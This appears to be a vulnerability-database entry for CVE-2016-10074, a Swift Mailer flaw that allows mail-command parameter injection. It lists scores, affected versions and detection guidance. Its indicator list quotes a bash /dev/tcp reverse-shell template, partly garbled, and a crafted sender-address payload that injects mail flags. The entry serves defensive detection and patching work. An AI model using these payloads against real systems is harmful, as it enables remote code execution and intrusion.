CVE-2016-10074
published 2016-12-30


Priority: P274 critical
CVSS 3.0: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Flags: EXPLOIT
EPSS: 41.83% (98.5th percentile)
The mail transport (aka Swift_Transport_MailTransport) in Swift Mailer before 5.4.5 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted e-mail address in the (1) From, (2) ReturnPath, or (3) Sender header.

Affected (4 ranges)

Vendor      | Product            | Version range                             | Fixed in
debian      | libphp-swiftmailer | < libphp-swiftmailer 5.4.2-1.1 (bookworm) | libphp-swiftmailer 5.4.2-1.1 (bookworm)
neos        | swiftmailer        | >= 0, < 5.4.5                             | 5.4.5
swiftmailer | swiftmailer        | <= 5.4.4                                  |
swiftmailer | swiftmailer        | >= 0, < 5.4.5                             | 5.4.5

Detection & IOCs (extracted from sources)

Indicators (type: command):
  • /bin/bash -c '0/dev/tcp/%s/%s;nohup sh &196 2>&196 &'
  • "a\' -be <cmd> "@a.co
  • /dev/tcp/%s/%s 0&1'
  • Detect parameter injection in Swift Mailer by monitoring for backslash double-quote sequences (\" ) in the From, ReturnPath, or Sender email header fields, which are used to escape out of the mail() command argument and inject extra parameters.
  • Monitor outbound /dev/tcp shell connections spawned from web server processes (e.g., apache, php-fpm), which are indicative of successful exploitation resulting in a reverse shell.
  • Alert on Swift_Transport_MailTransport processing email addresses containing -be or other mail command flags, as these indicate attempted parameter injection via the From/ReturnPath/Sender headers.
  • The vulnerability only affects Swift Mailer versions before 5.4.5; upgrading to 5.4.5 or later fully remediates the issue. Detection rules targeting older versions should be scoped accordingly.
  • The exploit targets the PHP mail() function's fifth argument (-f flag) via Swift_Transport_MailTransport; environments using SMTP transport instead of the mail() transport are not affected by this specific attack vector.

CVSS provenance

Source        | Version | Score | Severity | Vector
nvd           | v3.0    | 9.8   | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd           | v2.0    | 7.5   | HIGH     | AV:N/AC:L/Au:N/C:P/I:P/A:P
ghsa          |         | 9.8   | CRITICAL |
osv           |         | 9.8   | CRITICAL |
vendor_debian |         | 9.8   | CRITICAL |